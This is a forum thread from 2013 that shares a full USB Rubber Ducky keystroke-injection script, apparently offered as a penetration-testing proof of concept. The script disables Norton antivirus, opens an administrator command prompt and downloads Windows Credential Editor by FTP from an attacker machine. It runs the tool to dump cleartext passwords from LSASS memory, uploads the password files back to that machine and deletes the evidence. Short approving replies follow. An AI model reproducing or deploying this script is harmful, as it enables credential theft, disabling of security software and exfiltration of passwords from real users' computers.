tellerman5 Posted January 5, 2013 Share Posted January 5, 2013 (edited) Hi Folks, I wanted to share a new script I developed that shows a proof of concept for a rubber ducky and Windows Credential Editor (WCE) script that would would do the following:1.) Disable Antivirus for 15 minutes which is default. (This must be done to avoid signiture detection of WCE executable) 2.) FTP to attacker machine on the network, downloading the 32-bit & 64-bit version of WCE3.) Script then executes both versions, sending the output to a text file with the computer name as the variable of the file name. Note: One executable will fail (64 or 32 bit), but it will not write to the output file.4.) Script will then upload the file containing cleartext passwords for users logged in based on LSASS memory5.) The script will then remove all WCE executables as well the cleartext password file created before the antivirus program automatically start. Then closes all appropriate windowsThe video demo can be found at:http://youtu.be/IqUci4buvvMBelow is a copy of the script. Note: This is a proof of concept and will need to be tweaked per environment and penetration testing engagement.---------------------------------------------------------------------------------------------------------------------------------------------- code below: REM ###################################################################################################### REM # Author: G1 # REM # OS Designed and Tested on: Windows 7 SP1 x64 # REM # Anti-Virus Version: Norton Security Suite v 6.4.0.9 on Windows 7 OS # REM # FTP Platform: Backtrack 5 R3 / PureFTPD # REM # Rubber Ducky Encoder Required: Use Dnucna's 2.1 or greater # REM # http://code.google.com/p/ducky-decode/downloads/list # REM # # REM # This script was developed and intended to capture cleartext credentials stored in LSASS via # REM # Windows Credential Editor(WCE). The method process below contains these main sections: # REM # # REM # 1.) Disable Antivirus for 15 minutes which is default. (This must be done to avoid signiture # REM # detection of WCE executables) # REM # 2.) FTP to attacker machine on the network, downloading the 32-bit & 64-bit version of WCE # REM # 3.) Script then executes both versions, sending the output to a text file with the computer name # REM # as the variable of the file name. Note: One executable will fail (64 or 32 bit), but it # REM # will not write to the output file. # REM # 4.) Script will then upload the file containing cleartext passwords for users logged in based on # REM # LSASS memory # REM # 5.) The script will then remove all WCE executables as well the cleartext password file # REM # created before the antivirus program automatically start. Then closes all appropriate windows# REM # # REM # Prerequisites: # REM # - User of the targeted system MUST have ADMINISTATOR level access. # REM # - Attacker must maintain a copy of the 32-bit and 64-bit version of WCE in their FTP directory # REM # - Attacker's FTP server must have at least one directory that is writable. # REM # # REM # This script is meant as a guide and proof of concept of the usb rubber ducky. Tweaks for AV # REM # versions, FTP verisons and delays times may vary depending on the environment. # REM # # REM # # REM # # REM ###################################################################################################### REM REM *********************************************************************************** REM ****************NORTON-SECURITY-SUITE-N360***************************************** REM **********ANTI-VIRUS-VERSION-6.4.0.9--OS:Windows7********************************** REM ******************15-Minute-Disable************************************************ REM *********************************************************************************** DELAY 1000 CTRL ESCAPE DELAY 200 STRING Norton Security Suite DELAY 100 ENTER DELAY 3000 TAB DELAY 500 ENTER DELAY 2500 TAB TAB DELAY 50 ENTER DELAY 2500 TAB TAB TAB TAB TAB TAB TAB TAB TAB TAB TAB DELAY 500 ENTER DELAY 50 TAB DELAY 50 ENTER DELAY 50 TAB TAB DELAY 50 ENTER DELAY 500 SHIFT TAB DELAY 50 ENTER DELAY 3000 SHIFT TAB DELAY 100 ENTER DELAY 2000 SHIFT TAB DELAY 100 ENTER DELAY 1000 ALT F4 REM *********************************************************************************** REM ********************END-OF-NORTON-AV-DISABLE*************************************** REM *********************************************************************************** REM ------------------------------------- REM *********************************************************************************** REM FTP spawn to retrieve Windows Credential Editor 32-bit and 64-bit executables(wce.exe and wce_64.exe) REM *********************************************************************************** REM *********************************************************************************** DELAY 500 CTRL ESCAPE DELAY 200 STRING cmd DELAY 1500 CTRL-SHIFT ENTER DELAY 4000 LEFT DELAY 100 ENTER DELAY 1000 STRING ftp 192.168.1.140 ENTER DELAY 1000 REM FTP USERNAME below STRING <FTP USER> ENTER DELAY 500 REM FTP User password STRING <FTP PASSWORD> ENTER DELAY 700 STRING binary ENTER DELAY 100 STRING prompt ENTER DELAY 100 REM Assuming the wce.exe and wce_64.exe are in the root directory of the FTP server. STRING mget wce* ENTER DELAY 1000 REM *********************************************************************************** REM *********************************************************************************** REM Opening second Administrative command window to process FTP executables REM *********************************************************************************** REM *********************************************************************************** CTRL ESCAPE DELAY 200 STRING cmd DELAY 1500 CTRL-SHIFT ENTER DELAY 4000 LEFT DELAY 100 ENTER DELAY 1000 REM *********************************************************************************** REM *********************************************************************************** REM Pulling cleartext credentials for 64-bit and saving the file as %computername%-cleartext-PWs-64bit.txt REM *********************************************************************************** REM *********************************************************************************** STRING wce_64.exe -w -o %computername%-cleartext-PWs-64bit.txt ENTER DELAY 3000 REM *********************************************************************************** REM *********************************************************************************** REM Pulling cleartext credentials for 32-bit and saving the file as %computername%-cleartext-PWs-32bit.txt REM *********************************************************************************** REM *********************************************************************************** STRING wce.exe -w -o %computername%-cleartext-PWs-32bit.txt ENTER DELAY 3000 ALT TAB REM *********************************************************************************** REM *********************************************************************************** REM Back to FTP session on initial command window, entering writable directory for upload REM *********************************************************************************** REM *********************************************************************************** DELAY 200 STRING cd upload ENTER DELAY 100 REM *********************************************************************************** REM *********************************************************************************** REM Upload all cleartext password files from the Windows Credential Editor command. REM *********************************************************************************** REM *********************************************************************************** STRING mput *cleartext-PWs* ENTER DELAY 2000 STRING quit ENTER DELAY 500 STRING exit ENTER DELAY 50 REM *********************************************************************************** REM *********************************************************************************** REM Cleaning up the files created and exiting command windows. REM *********************************************************************************** REM *********************************************************************************** STRING del wce.exe wce_64.exe %computername%-cleartext-PWs-64bit.txt %computername%-cleartext-PWs-32bit.txt ENTER DELAY 100 STRING exit ENTER ------------------------------------------------------------------------------------------------------------------------ Edited February 6, 2013 by midnitesnake corrected formatting Quote Link to comment Share on other sites More sharing options...
no42 Posted January 5, 2013 Share Posted January 5, 2013 (edited) Nice PoC and Vid. Edited January 5, 2013 by midnitesnake Quote Link to comment Share on other sites More sharing options...
tellerman5 Posted January 5, 2013 Author Share Posted January 5, 2013 Hey Midnitesnake - thanks for the correction! Sorry I misspelled your name in the comments as well. :-P You and Dnucna keep up the great work on the platform. Really enjoying this addition perspective for my team's pentest activities. Cheers! G1 Quote Link to comment Share on other sites More sharing options...
Dnucna Posted January 5, 2013 Share Posted January 5, 2013 Hi tellerman5, You are welcome ! I'm happy to see a usefull application of ctrl-shift :) Dnu Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.